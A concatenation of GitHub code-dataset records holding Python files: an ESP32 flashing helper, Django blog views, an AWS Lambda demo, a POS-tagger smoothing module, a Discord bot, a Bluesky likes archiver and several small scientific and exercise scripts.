None,\n partition_file: Optional[str] = None,\n bootloader_file: Optional[str] = None,\n erase_flash: bool = False,\n baud: Optional[int] = None,\n before: Optional[str] = None,\n after: Optional[str] = None,\n flash_mode: Optional[str] = None,\n flash_freq: Optional[str] = None,\n flash_size: Optional[str] = None,\n application_offset: Optional[int] = None,\n partition_offset: Optional[int] = None,\n bootloader_offset: Optional[int] = None,\n flash_settings_file: Optional[str] = None,\n ) -> None:\n \"\"\"Upgrade the device based on the provided build arguments.\n\n For details related to before/after flash arguments refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/advanced-options.html#reset-modes\n\n For details related to flash mode, ferq, size arguments refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/flash-modes.html#\n\n Each entry in the partition table file has a name (label), type\n (app, data, or something else), subtype and the offset in flash where the\n partition is loaded. For details refer to\n https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-guides/partition-tables.html#partition-tables\n\n A Bootloader selects and loads application image into RAM. To update the\n device bootloder image please specify a bootloader.bin generated when\n compiling a esp32 project. For details refer to\n https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-guides/bootloader.html#bootloader\n\n Args:\n build_file: Local path to the application file.\n partition_file: Local path to the partition table file.\n bootloader_file: Local path to the bootloader file.\n erase_flash: True if everything needs to be erased before flashing.\n baud: Baudrate for device serial communication.\n before: Action to perform before flashing.\n after: Action to perform after flashing is complete.\n flash_mode: Mode for flashing.\n flash_freq: Clock frequency for SPI flash interactions.\n flash_size: Size of the SPI flash to use.\n application_offset: Memory offset in hex format to flash application\n binary.\n partition_offset: Memory offset in hex format to flash partition-table\n binary.\n bootloader_offset: Memory offset in hex format to flash bootloader binary.\n flash_settings_file: *.flash.py present when using a matter sample app\n from matter-automation-project. This file will be used to read default\n flash settings. These can be overridden if user explicitly passes them as\n an argument.\n \"\"\"\n build_args = {\n name: value for name, value in locals().items() if name not in ['self']\n }\n flash_args_keys = self._flash_args.keys()\n\n # Update flash arguments from *.flash.py\n if flash_settings_file:\n with open(flash_settings_file) as settings_file:\n settings = settings_file.read()\n # Regex for flash arguments such as `'flash_freq': '30m',`.\n pattern = re.compile(r\"'(\\w+)': '(\\w+)',\", re.MULTILINE | re.ASCII)\n self._flash_args.update({\n match.group(1): match.group(2)\n for match in re.finditer(pattern, settings)\n if match.group(1) in flash_args_keys and match.group(2) is not None\n })\n\n # Override flash settings with user provided arguments.\n self._flash_args.update({\n build_args_key: build_args_value\n for build_args_key, build_args_value in build_args.items()\n if build_args_key in flash_args_keys and build_args_value is not None\n })\n\n self.flash_device(\n list_of_files=[build_file, bootloader_file, partition_file],\n erase_flash=erase_flash)\n\n","repo_name":"google/gazoo-device","sub_path":"gazoo_device/capabilities/flash_build_esptool.py","file_name":"flash_build_esptool.py","file_ext":"py","file_size_in_byte":13314,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"44"} +{"seq_id":"38999341272","text":"from .models import Post, Comment, UserSettings\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import PostForm, CommentForm, UserSettingsForm\ndef index(request):\n posts = Post.objects.all().order_by('-created_at')\n return render(request, 'index.html', {'posts': posts})\n\ndef post_detail(request, post_id):\n post = Post.objects.get(id=post_id)\n return render(request, 'post_detail.html', {'post': post})\n\ndef register(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('index')\n else:\n form = UserCreationForm()\n return render(request, 'registration/register.html', {'form': form})\n\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.save()\n return redirect('post_detail', post_id=post.id)\n else:\n form = PostForm()\n return render(request, 'blogapp/post_edit.html', {'form': form})\n\ndef post_edit(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.save()\n return redirect('post_detail', post_id=post.id)\n else:\n form = PostForm(instance=post)\n return render(request, 'blogapp/post_edit.html', {'form': form})\n\ndef post_delete(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n post.delete()\n return redirect('index')\n\ndef add_comment(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.author = request.user\n comment.save()\n return redirect('post_detail', post_id=post.id)\n else:\n form = CommentForm()\n return render(request, 'blogapp/add_comment.html', {'form': form})\n\ndef delete_comment(request, comment_id):\n comment = get_object_or_404(Comment, id=comment_id)\n post_id = comment.post.id\n comment.delete()\n return redirect('post_detail', post_id=post_id)\n\ndef search(request):\n query = request.GET.get('q')\n results = Post.objects.filter(title__icontains=query)\n return render(request, 'search.html', {'results': results})\n\ndef profile(request, user_id):\n user = User.objects.get(id=user_id)\n posts = Post.objects.filter(author=user)\n return render(request, 'profile.html', {'user': user, 'posts': posts})\n\ndef manage_posts(request, user_id):\n user = User.objects.get(id=user_id)\n posts = Post.objects.filter(author=user)\n return render(request, 'manage_posts.html', {'posts': posts})\n\ndef settings(request, user_id):\n user = User.objects.get(id=user_id)\n settings = UserSettings.objects.get_or_create(user=user)[0]\n if request.method == \"POST\":\n form = UserSettingsForm(request.POST, instance=settings)\n if form.is_valid():\n form.save()\n return redirect('profile', user_id=user.id)\n else:\n form = UserSettingsForm(instance=settings)\n return render(request, 'settings.html', {'form': form})","repo_name":"lsaac1208/djangoProject","sub_path":"blogproject/blogapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42801815076","text":"import pandas as pd\nfrom clearml import Dataset\nfrom sklearn.model_selection import train_test_split\n\n\ndef prepare_data(dataset_id=None, dataset_alias=None, dataset_name=None, dataset_project=None):\n # Read the data\n data_path = Dataset.get(\n dataset_id=dataset_id,\n alias=dataset_alias,\n dataset_name=dataset_name,\n dataset_project=dataset_project,\n ).get_local_copy()\n data = pd.read_csv(f\"{data_path}/sample.csv\", sep=\";\").fillna(0).astype(float)\n\n X_train, X_test, y_train, y_test = train_test_split(\n data.drop(columns=[\"target\"]), data[\"target\"], test_size=0.33, random_state=42\n )\n\n return X_train, y_train, X_test, y_test\n","repo_name":"kryvokhyzha/experiment-tracking-clearml","sub_path":"src/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74514494851","text":"#!/usr/bin/env python\nimport argparse,ROOT,os,math,pprint\nparser = argparse.ArgumentParser(add_help=False, description='make signal contamination plots')\nparser.add_argument('inFile')\nargs = parser.parse_args()\nlumi = 35\nmjCut = 0.8\nbDict = {'4jVRb0':(128.5),\n '4jVRb1':(46.5),\n '4jSRb0':(299.1),\n '4jSRb1':(104.3),\n '5jVRb0':(7.5),\n '5jVRb1':(3.0),\n '5jSRb0':(16.4),\n '5jSRb1':(7.6)}\nyieldDict = {}\nf = ROOT.TFile.Open(args.inFile)\nt = f.Get('miniTree')\nnEntries = t.GetEntries()\n\nfor entry in range(nEntries):\n# if entry % 10000 == 0:\n# print 'processing entry %i' % entry\n t.GetEntry(entry)\n dsid = t.mcChannelNumber\n if not dsid in yieldDict:\n yieldDict[dsid] = {'4jVRb0':0.0,\n '4jVRb1':0.0,\n '4jSRb0':0.0,\n '4jSRb1':0.0,\n '5jVRb0':0.0,\n '5jVRb1':0.0,\n '5jSRb0':0.0,\n '5jSRb1':0.0}\n if t.MJ < mjCut:\n continue\n if t.njet == 4:\n if t.dEta > 1.0:\n if t.nbjet_Fix70 == 0:\n yieldDict[dsid]['4jVRb0'] += t.weight*lumi / math.sqrt(bDict['4jVRb0'])\n else:\n yieldDict[dsid]['4jVRb1'] += t.weight*t.bSF_70*lumi / math.sqrt(bDict['4jVRb1'])\n else:\n if t.nbjet_Fix70 == 0:\n yieldDict[dsid]['4jSRb0'] += t.weight*lumi / math.sqrt(bDict['4jSRb0'])\n else:\n yieldDict[dsid]['4jSRb1'] += t.weight*t.bSF_70*lumi / math.sqrt(bDict['4jSRb1'])\n elif t.njet >= 5:\n if t.dEta > 1.0:\n if t.nbjet_Fix70 == 0:\n yieldDict[dsid]['5jVRb0'] += t.weight*lumi / math.sqrt(bDict['5jVRb0'])\n else:\n yieldDict[dsid]['5jVRb1'] += t.weight*t.bSF_70*lumi / math.sqrt(bDict['5jVRb1'])\n else:\n if t.nbjet_Fix70 == 0:\n yieldDict[dsid]['5jSRb0'] += t.weight*lumi / math.sqrt(bDict['5jSRb0'])\n else:\n yieldDict[dsid]['5jSRb1'] += t.weight*t.bSF_70*lumi / math.sqrt(bDict['5jSRb1'])\npprint.pprint(yieldDict)\n","repo_name":"btamadio/MJBkg","sub_path":"scripts/makeSigContamDict.py","file_name":"makeSigContamDict.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"35014041805","text":"#!/usr/bin/env python\n\n'''\nhttps://gist.github.com/liladas/94a9d6510ec55188baa20481c3b7a225\n\n# open the aws console for this function\nopen https://us-east-2.console.aws.amazon.com/lambda/home?region=us-east-2#/functions/hello_upper?tab=configuration\n\n# do an uppercase (default) operation\naws lambda invoke --function-name hello_upper --payload '{ \"word\": \"example\" }' response.json;\ncat response.json;\n\n# do a lowercase operation\naws lambda invoke --function-name hello_upper --payload '{ \"word\": \"ALL_CAPS\", \"operation\": \"lower\" }' response.json;\ncat response.json;\n\n# do an invalid request\naws lambda invoke --function-name hello_upper --payload '{ \"wordx\": \"ALL_CAPS\", \"operation\": \"lower\" }' response.json;\n\n# print some logs using CLI (this isn't a very useful thing...)\naws logs filter-log-events --log-group-name /aws/lambda/hello_upper --filter-pattern \"lower\" | jq .events[].message | sed 's/\"//g'\n\n# print some logs, no filter\naws logs filter-log-events --log-group-name /aws/lambda/hello_upper | jq .events[].message | sed 's/\"//g'\n\n# show cloudwatch\nopen https://us-east-2.console.aws.amazon.com/cloudwatch/home?region=us-east-2#logStream:group=/aws/lambda/hello_upper;streamFilter=typeLogStreamPrefix\n\n'''\n\nimport json\nimport time\n\n\ndef uppercase(string):\n ''' upper the letters in the string '''\n return string.upper()\n\n\ndef lowercase(string):\n ''' lowercase the letters in the string '''\n return string.lower()\n\n\n# function mapping\nstring_function_mapping = {\n 'lower': lowercase,\n 'upper': uppercase\n}\n\n\ndef lambda_handler(event, context):\n # print the event object\n print(json.dumps(event, indent=2, sort_keys=True))\n\n # print some of the context object items\n print(\"Log stream name:\", context.log_stream_name)\n print(\"Log group name:\", context.log_group_name)\n print(\"Request ID:\",context.aws_request_id)\n print(\"Mem. limits(MB):\", context.memory_limit_in_mb)\n\n # Code will execute quickly, so we add a 1 second intentional delay so you can see that in time remaining value.\n time.sleep(1)\n print(\"Time remaining (MS):\", context.get_remaining_time_in_millis())\n\n string_operation = event.get('operation', 'upper')\n word = event.get('word', None)\n\n if not word:\n print(\"No word specified...\")\n return dict(word=None, error=\"no word specified\")\n\n new_word = string_function_mapping[string_operation](word)\n\n print(\"%s ==> %s ==> %s\" % (word, string_operation, new_word ))\n\n return dict(word=word, new_word=new_word, operation=string_operation)\n","repo_name":"liladas/serverless_demo","sub_path":"hello_upper/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12455790403","text":"import numpy as np\n\n# calcola la probabilità che un termine sconosciuto abbia un certo pos in base\n# all'analisi fatta sul dev-set file\ndef statisticsOnDevSet(fileName, pos):\n with open(fileName, 'r', encoding='utf-8') as file:\n lines = file.readlines()\n words={}\n deletedWords=[]\n statistics = np.zeros(len(pos))\n for line in lines:\n wordsInLine = line.split()\n # i seguenti due controlli servono per capire quando analizzare il corpus per il pos\n # Se la riga incomincia con '#' significa che è iniziato il corpus successivo\n # e c'è bisogno di resettare il tag precedente\n if line.startswith('1'):\n analyze = True\n elif line.startswith('#'):\n analyze = False\n # analizziamo la riga e segniamo l'occorrenza del pos\n if analyze is True:\n if (wordsInLine != []):\n w = wordsInLine[1].lower()\n if w not in words.keys() and w not in deletedWords:\n words[w] = wordsInLine[3]\n elif w in words.keys():\n words.pop(w,None)\n deletedWords.append(w)\n\n for index,p in enumerate(pos):\n statistics[index] = list(words.values()).count(p)\n\n return statistics/len(words.keys())\n\n# funzione per lo smoothing che fa uso di diverse metodologie per cercare\n# di migliorare i risultati\ndef getUnknownTag(word, language, pos):\n posWord = np.zeros(len(pos))\n nounAdj = []\n adj = []\n verb = []\n noun = []\n adverb = []\n if language == \"Latino\":\n nounAdj = ['aria', 'arium', 'arius', 'atus', 'cola', 'colum', 'dicus', 'ellus', 'genus', 'gena', 'gen',\n 'mentum', 'or', 'tas', 'tus', 'ter', 'tio', 'tor', 'trix', 'trina', 'tudo', 'unculus', 'ura']\n adj = ['aceus', 'alis', 'andus', 'endus', 'iendus', 'ans', 'antis', 'ens', 'entis', 'iens', 'ientis', 'anus',\n 'aticus', 'atus', 'bilis', 'bundus', 'ellus', 'ensis', 'esimus', 'eus', 'ilis', 'inus', 'ior', 'ius',\n 'issimis', 'imus', 'osus', 'torius', 'timus', 'ulus']\n verb = ['esco', 'ico', 'ito', 'sco', 'so', 'sso', 'to', 'urio']\n\n if language == \"Greco\":\n noun = ['της', 'τής', 'ίτης', 'ώτης']\n adj = ['ῐος', 'εῖος']\n adverb = ['ως']\n verb = ['ίζω']\n\n for n in noun:\n if word.endswith(n):\n posWord[pos.index(\"NOUN\")] = 1\n return posWord\n\n for adv in adverb:\n if word.endswith(adv):\n posWord[pos.index(\"ADV\")] = 1\n return posWord\n\n for na in nounAdj:\n if word.endswith(na):\n posWord[pos.index(\"NOUN\")] = 0.5\n posWord[pos.index(\"ADJ\")] = 0.5\n return posWord\n\n for a in adj:\n if word.endswith(a):\n posWord[pos.index(\"ADJ\")] = 1\n return posWord\n\n for v in verb:\n if word.endswith(v):\n posWord[pos.index(\"VERB\")] = 1\n return posWord\n\n posWord[np.where(pos == \"NOUN\")] = 1\n return posWord\n\n# smoothingType = 0: unknown -> NOUN\n# smoothingType = 1: unknown -> NOUND/VERB\n# smoothingType = 2: unknown -> distribution on pos\n# smoothingType = 3: unknown -> distribution on dev set\ndef smoothing(pos, type, devFileName) :\n smoothingVector = np.zeros(len(pos))\n if type == 0:\n smoothingVector[pos.index(\"NOUN\")] = 1\n elif type == 1:\n smoothingVector[pos.index(\"NOUN\")] = 0.5\n smoothingVector[pos.index(\"VERB\")] = 0.5\n elif type == 2:\n smoothingVector = np.ones(len(pos))*(1/len(pos))\n elif type == 3:\n smoothingVector = statisticsOnDevSet(devFileName, pos)\n return smoothingVector","repo_name":"TLN2021/PosTagger","sub_path":"PostaggerExercise/Smoothing.py","file_name":"Smoothing.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38970784327","text":"'''\nYou are given a tree and you need to do the level order traversal on this tree.\nLevel order traversal of a tree is breadth-first traversal for the tree.\n\nLevel order traversal of above tree is 1 2 3 4 5\n\nInput:\nFirst line of input contains the number of test cases T. For each test case, there will be only a single line of input which is a string representing the tree as described below: \n\n The values in the string are in the order of level order traversal of the tree where, numbers denotes node values, and a character “N” denotes NULL child.\n\n For example:\n\n For the above tree, the string will be: 1 2 3 N N 4 6 N 5 N N 7 N\n\nOutput:\nThe function should print the level order traversal of the tree as specified in the problem statement.\n\nYour Task:\nYou don't have to take any input. Just complete the function levelOrder() that takes the root node as parameter and returns an array containing the level order traversal of the given Binary Tree.\n\nExpected Time Complexity: O(N).\nExpected Auxiliary Space: O(N).\n\nConstraints:\n1 <= T <= 100\n1 <= Number of nodes<= 104\n1 <= Data of a node <= 104\n\nExample:\nInput:\n2\n1 3 2\n10 20 30 40 60 N N\nOutput:\n1 3 2\n10 20 30 40 60\n\nExplanation:\nTestcase1: The tree is\n 1\n / \\\n 3 2\nSo, the level order would be 1 3 2\nTestcase2: The tree is\n 10\n / \\\n 20 30\n / \\\n 40 60\nSo, the level order would be 10 20 30 40 60\n'''\n\nclass Node:\n def __init__(self, value):\n self.left = None\n self.data = value\n self.right = None\n\n# Your task is to complete this function\n# Function should return the level order of the tree in the form of a list of integers\n\ndef levelOrder( root ):\n if root is None:\n return\n q = []\n l = []\n q.append(root)\n l.append(root.data)\n while( len(q) > 0 ):\n node = q.pop(0)\n if(node.left != None):\n q.append(node.left)\n l.append(node.left.data)\n if(node.right != None):\n q.append(node.right)\n l.append(node.right.data)\n return l\n","repo_name":"shabnam49/Geeks_For_Geeks","sub_path":"Easy/Level-order-traversal.py","file_name":"Level-order-traversal.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33291529804","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 15 22:32:33 2019\n\n@author: dennis\n\"\"\"\n\nfrom IntcodeComputer import IntcodeComputer\nfrom IntcodeComputer import read_opcode\nimport Game\nimport networkx as nx\n\nopcodes = read_opcode('data/input.txt')\ncomputer = IntcodeComputer(opcodes.copy(), [])\ngame = Game.Game()\n\ndef move_long(moves):\n for move in moves:\n while not computer.awaiting_input:\n computer.step()\n computer.input_queue.append(move)\n while not computer.output_queue:\n computer.step()\n game.move(move, computer.output_queue.pop())\n# game.draw()\n \ndef dist_to_node(pos):\n return len(game.get_path(pos))\n\nold_pos = (1, 1)\nco = 0\n#while not game.done:\nwhile game.to_test:\n if computer.awaiting_input:\n for i in range(1, len(game.to_test)):\n next_node = game.to_test[-i]\n if next_node not in game.visited:\n continue\n game.visited.add(next_node)\n if (next_node == (game.player.x, game.player.y)) or (next_node in game.visited):\n if next_node in game.to_test:\n game.to_test.remove(next_node)\n path = game.get_path(next_node)\n moves = [game.get_move(path[i], path[i+1]) for i in range(len(path)-1)]\n old_pos = (game.player.x, game.player.y)\n move_long(moves)\n co += 1\n computer.step()\n\ngame.graph.remove_edge((50,50), (50,51))\ngame.graph.remove_edge((50,50), (50,49))\ngame.graph.remove_edge((50,50), (51,50))\n#game.draw_solution()\nprint(nx.astar_path_length(game.graph, (50, 50), (game.answer[0], game.answer[1])))\n","repo_name":"dennissv/aoc-bit","sub_path":"day-15/dennis.py","file_name":"dennis.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40421157002","text":"from taichi.core import tc_core\nfrom taichi.misc.util import *\nfrom taichi.scoping.transform_scope import get_current_transform\nimport taichi\n\ndef map_filename(name):\n if name == 'plane':\n return taichi.geometry.create_plane((1, 1))\n elif name == 'sphere':\n return taichi.geometry.create_sphere((100, 100))\n elif name == 'torus':\n return taichi.geometry.create_torus((100, 100), 0.7, 1.0)\n if name.rfind('/') == -1:\n filename = taichi.settings.get_asset_path('meshes/' + name + '.obj')\n else:\n filename = name\n return filename\n\n\nclass Mesh:\n def __init__(self, filename_or_triangles, material=None, translate=Vector(0, 0, 0), rotation=Vector(0, 0, 0),\n scale=Vector(1, 1, 1),\n transform=None):\n if isinstance(filename_or_triangles, str):\n filename_or_triangles = map_filename(filename_or_triangles)\n self.c = tc_core.create_mesh()\n if isinstance(filename_or_triangles, str):\n self.c.initialize(config_from_dict({'filename': filename_or_triangles}))\n else:\n self.c.initialize(config_from_dict({'filename': ''}))\n self.c.set_untransformed_triangles(filename_or_triangles)\n if transform:\n self.c.transform = transform\n self.c.set_material(material.c)\n self.scale(scale)\n self.rotate_euler(rotation)\n self.translate(translate)\n self.set_transform(get_current_transform() * self.c.transform)\n\n def set_transform(self, transform):\n self.c.transform = transform\n\n def scale(self, s):\n if isinstance(s, float) or isinstance(s, int):\n self.c.transform = self.c.transform.scale_s(float(s))\n else:\n self.c.transform = self.c.transform.scale(Vector(s))\n\n def rotate_euler(self, rotation):\n self.c.transform = self.c.transform.rotate_euler(Vector(rotation))\n\n def translate(self, translate):\n self.c.transform = self.c.transform.translate(Vector(translate))\n\n def __getattr__(self, key):\n return self.c.__getattribute__(key)\n","repo_name":"CallmeNezha/taichi","sub_path":"python/taichi/visual/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"74931884841","text":"from db import db\nfrom models.user import UserModel\nfrom utils.date_format import getTimeStringFromTimeStamp\nfrom sqlalchemy import desc\n\nclass TransactionModel(db.Model):\n __tablename__ = 'transactions'\n\n id = db.Column(db.Integer, primary_key=True)\n amount = db.Column(db.Integer)\n desc = db.Column(db.String(100))\n source = db.Column(db.String(100))\n status = db.Column(db.Integer, default=1, nullable=True, comment=\"0 là khởi tạo, 1 là thành công\")\n created_at = db.Column(db.Integer, nullable=True, comment=\"Timestamp\")\n created_by = db.Column(db.String(255), nullable=True, comment=\"Timestamp\")\n updated_at = db.Column(db.Integer, nullable=True, comment=\"Timestamp\")\n updated_by = db.Column(db.String(255), nullable=True, comment=\"Timestamp\")\n\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n user = db.relationship('UserModel')\n\n def __init__(self, amount, desc, source, status, user_id, created_at, created_by, updated_at, updated_by):\n self.amount = amount\n self.desc = desc\n self.source = source\n self.status = status\n self.user_id = user_id\n self.created_at = created_at\n self.created_by = created_by\n self.updated_at = updated_at\n self.updated_by = updated_by\n\n def json(self):\n user = UserModel.find_by_id(self.user_id)\n\n return {\n 'id': self.id,\n 'amount': self.amount,\n 'desc': self.desc,\n 'source': self.source,\n 'status': self.status,\n 'user_id': self.user_id,\n 'user_name': user.username if user else None,\n 'created_at': self.created_at,\n 'created_at_string': None if self.created_at is None else getTimeStringFromTimeStamp(self.created_at),\n 'created_by': self.created_by,\n 'updated_at': self.updated_at,\n 'updated_at_string': None if self.updated_at is None else getTimeStringFromTimeStamp(self.updated_at),\n 'updated_by': self.updated_by,\n }\n\n @classmethod\n def find_by_apikey(cls, apikey):\n return cls.query.filter_by(apikey=apikey).first()\n\n @classmethod\n def find_by_id(cls, _id):\n return cls.query.filter_by(id=_id).first()\n\n def save_to_db(self):\n db.session.add(self)\n db.session.commit()\n\n @classmethod\n def find_all(cls):\n return cls.query.order_by(desc(cls.created_at)).all()\n\n @classmethod\n def q(cls, filters=None, order=None, order_by=None, page=0, page_size=10):\n search = \"%{}%\".format(filters) if filters is not None else \"%%\"\n return cls.query.filter(cls.desc.like(search)).order_by(cls.created_at.desc()).offset(page * page_size).limit(\n page_size).all()\n\n def delete_from_db(self):\n db.session.delete(self)\n db.session.commit()\n","repo_name":"toannguyen3105/sampleAPIFlask","sub_path":"models/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34055618335","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import MemberConverter\nimport os\n\nTOKEN = os.environ['TOKEN']\nbot = commands.Bot(command_prefix='//')\n\n@bot.event\nasync def on_ready():\n print('Benzene is ready to go!')\n\n@bot.command()\nasync def ping(ctx):\n await ctx.channel.send(f\"Pong! {round(bot.latency * 1000)}ms\")\n\n@bot.command()\nasync def getpfp(ctx, arg):\n\n converter = MemberConverter()\n member = await converter.convert(ctx, arg)\n await ctx.send(member.avatar_url)\n\n@bot.command()\nasync def clear(ctx, amount = 1):\n await ctx.channel.purge(limit = amount+1)\n\n@bot.command(pass_context=True)\n@commands.has_role(\"Admin\")\n@commands.has_permissions(kick_members=True)\nasync def kick(ctx, arg):\n converter = MemberConverter()\n member = await converter.convert(ctx, arg)\n await ctx.send('kik')\n await bot.kick(member)\n\n\nbot.run(TOKEN)\n","repo_name":"Cookieglue/Benzene-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21892183367","text":"import json\nimport csv\nimport os\nfrom database import db_operations\n\n\n\n\n\ndbo = db_operations.DBOperator()\n\ndef insert_top_urls():\n urls_path = '../SWSec_Data/top_sites2.json'\n with open(urls_path,'r') as o:\n sites = json.loads(o.read())\t\t\t\n for item in sites:\n rank = int(item['Country']['Rank'])\n url = 'https://' + item['DataUrl']\t \n dbo.insert_alexa_sites_table(url, rank )\n\ndef update_pwa_sites():\n urls_path = '../SWSec_Crawler/data/crawl_sites_sw.csv'\n with open(urls_path) as cf:\n csvreader = csv.DictReader(cf, delimiter=',' )\t\t\t\n for row in csvreader:\t\t\n if 'Alexa' in row['id']:\n rank = row['id'].split('_')[2] \n url = row['url']\n print(url)\n dbo.update_alexa_sites_table(None, url, 'is_sw_found', 'True')\n\t\t\t\t\ndef update_crawled_sites():\n dir_path = '../SWSec_Crawler/output_logs/'\n for f in os.listdir(dir_path):\n if 'container_Seed_Alexa_' in f:\n rank = int(f.split('.')[0].split('_')[3])\n dbo.update_alexa_sites_table(rank, None, 'is_crawled', 'True')\t\t\t\t\n\nif __name__ == \"__main__\":\n # insert_top_urls()\n # update_pwa_sites()\n update_crawled_sites()","repo_name":"karthikaS03/SW_Sec_Project","sub_path":"SWSec_Analysis/process_seed_urls.py","file_name":"process_seed_urls.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6389853176","text":"import requests\nimport arrow\nimport math\nimport time\nimport sys\nimport urllib.parse\nfrom dataclasses import dataclass\nfrom functools import lru_cache\n\ndef list_likes(user, limit=100, cursor=None):\n params = {\n 'repo': user,\n 'collection': 'app.bsky.feed.like',\n 'limit': str(limit)\n }\n if cursor:\n params['cursor'] = cursor\n\n r = requests.get('https://bsky.social/xrpc/com.atproto.repo.listRecords?' + urllib.parse.urlencode(params))\n if r.status_code // 100 != 2:\n raise Exception(f'error status code for list_likes: {r.status_code} {r.text} {params}')\n \n return r.json()\n\n@dataclass\nclass AtUri:\n repo: str\n collection: str\n rkey: str\n\n @staticmethod\n def parse(uri):\n if not uri.startswith('at://'):\n return None\n parts = uri[len('at://'):]\n parts = parts.split('/', 2)\n return AtUri(repo=parts[0], collection=parts[1], rkey=parts[2])\n\ndef get_post(uri, cid):\n ref = AtUri.parse(uri)\n params = {\n 'repo': ref.repo,\n 'collection': ref.collection,\n 'rkey': ref.rkey,\n 'cid': cid\n }\n\n r = requests.get('https://bsky.social/xrpc/com.atproto.repo.getRecord?' + urllib.parse.urlencode(params))\n if r.status_code // 100 != 2:\n raise Exception(f'error status code for get_post: {r.status_code} {r.text} {params}')\n \n return r.json()\n\n@lru_cache(maxsize=500)\ndef get_user(repo):\n params = {\n 'repo': repo\n }\n\n r = requests.get('https://bsky.social/xrpc/com.atproto.repo.describeRepo?' + urllib.parse.urlencode(params))\n if r.status_code // 100 != 2:\n raise Exception(f'error status code for get_user: {r.status_code} {r.text} {params}')\n \n return r.json()\n\ndef fetch_likes(user, limit=100, stop_at=None):\n sleep_time = 0.0005 * limit\n if limit <= 0:\n limit = math.inf\n sleep_time = 0.001\n chunk_size = min(limit, 100)\n stop_time = arrow.get(stop_at) if stop_at else None\n\n likes = []\n cursor = None\n\n remaining = limit\n while remaining > 0:\n out = list_likes(user, chunk_size, cursor=cursor)\n new_likes = out.get('records', [])\n\n exit = False\n for like in new_likes:\n created_ts = arrow.get(like['value']['createdAt'])\n if stop_time and created_ts <= stop_time:\n exit = True\n break\n try:\n post = get_post(like['value']['subject']['uri'], like['value']['subject']['cid'])\n if post:\n like['value']['subject'] = post\n post_uri = AtUri.parse(like['value']['subject']['uri'])\n try:\n post_user = get_user(post_uri.repo)\n if post_user:\n like['value']['user'] = post_user\n except Exception as ue:\n print(f'could not fetch user: {ue}\\nfrom post: {post}\\nfrom like: {like}\\n\\n', file=sys.stderr)\n except Exception as e:\n print(f'could not fetch post: {e}\\nfrom like: {like}\\n\\n', file=sys.stderr)\n\n likes.append(like)\n remaining -= 1\n time.sleep(sleep_time)\n \n if 'cursor' not in out or out['cursor'] == cursor:\n exit = True\n \n if exit:\n break\n\n cursor = out['cursor']\n \n return likes\n\n\n","repo_name":"jwoglom/bluesky-likes-archiver","sub_path":"bsky.py","file_name":"bsky.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19164176360","text":"from PyQt5.QtCore import Qt\n\ntry:\n from PyQt5 import QtCore\n from PyQt5.QtWidgets import QWidget, QHBoxLayout, QLabel, QDockWidget, QVBoxLayout, QListWidget, QAbstractItemView, \\\n QMessageBox, QApplication, QGridLayout, QGroupBox, QScrollArea, QTableWidget, QSizePolicy, QTableWidgetItem, \\\n QPushButton, QCheckBox, QTreeWidget, QTreeWidgetItem, QHeaderView\nexcept ImportError as e:\n print(\n f'package PyQt5 Not Found\\n{e}\\ntry :\\npip3 install --user pyqt5\\nOR\\ndnf install python3-pyqt5, yum install python3-pyqt5\\n')\n\ntry:\n import qtmodern.styles\n import qtmodern.windows\nexcept ImportError as e:\n print(f'package qtmodern Not Found\\n{e}\\ntry :\\npip3 install --user qtmodern\\n')\n\ntry:\n from backup.configurebackup import CreateFullBackupWindow, DeleteFullBackupWindow, DeleteIncBackupWindow, \\\n 